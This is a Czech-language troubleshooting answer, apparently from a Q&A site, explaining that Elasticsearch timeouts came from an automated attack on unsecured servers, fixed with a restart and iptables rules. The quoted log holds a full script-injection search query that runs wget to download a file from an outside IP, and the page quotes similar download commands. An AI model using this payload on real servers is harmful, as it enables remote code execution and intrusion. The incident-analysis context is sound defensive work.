sql >> Databáze >  >> NoSQL >> MongoDB

Časový limit Elasticsearch vyprší při každém požadavku na vyhledávání až do restartu

Problém vyřešen:

Příčina: Robotický útok na naše servery, které nebyly zabezpečeny.

Podle článku zveřejněného elasticsearch:

https://www.elastic.co/blog/scripting-security/

Provedena akce: Na náš loutkový server jsme přidali pravidla iptables, abychom použili všechny naše elasticsearch servery.

Udělali jsme chybu a bohužel jsme zaplatili cenu. Jsme zpět a běžíme právě teď.

No podle protokolů jsem našel něco velmi podezřelého

[2015-04-30 05:05:59,808][DEBUG][action.search.type       ] [Saint Anna] [_river][0], node[Oq7k-P26RoabKCjZ_YmlIw], [P], s[STARTED]: Failed to execute [[email protected]] lastShard [true]
org.elasticsearch.transport.RemoteTransportException: [Anaconda][inet[/192.168.5.2:9300]][indices:data/read/search[phase/query]]
Caused by: org.elasticsearch.search.SearchParseException: [_river][0]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/xiao3 http://121.42.221.14:666/xiao3\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}}, "size": 1}]]

Zkrátím hlavní část:

exec(\"wget -O /tmp/xiao3 http://121.42.221.14:666/xiao3\")

Toto je forma robotického hacku, protože nemáme nikoho jménem xiao nebo nehostíme naše servery v Číně (podle GEO-IP), měli jsme podezření na tuto linku.

Podle výše uvedeného článku:

[Error: Runtime.getRuntime().exec("wget http://XXX.XXX.XX.XXX/.../4.sh -O /tmp/.4.sh").getInputStream(): Cannot run program "wget": error=2, No such file or directory]
Caused by: java.io.IOException: Cannot run program "wget": error=2, No such file or directory
[Error: Runtime.getRuntime().exec("wget http://XXX.XXX.XX.XXX/.../getsetup.hb").getInputStream(): Cannot run program "wget": error=2, No such file or directory]
After vulnerable systems have been exploited, the infected system is running code in the /boot/.iptables file as well as modified /etc/init.d scripts.

Hacker použil nějaké ošklivé dotazy, které způsobily, že naše elasticsearch přestalo fungovat.

Restartovali jsme naše servery a přidali Iptables a jsme zpět v provozu.




  1. Jak zjistit počet na základě podmínky v agregaci MOngoDB?

  2. jak načíst částečné objekty z pole objektů v poli v mongodb

  3. Asp.net core web api s chybou mongodb 500

  4. MongoDB $isArray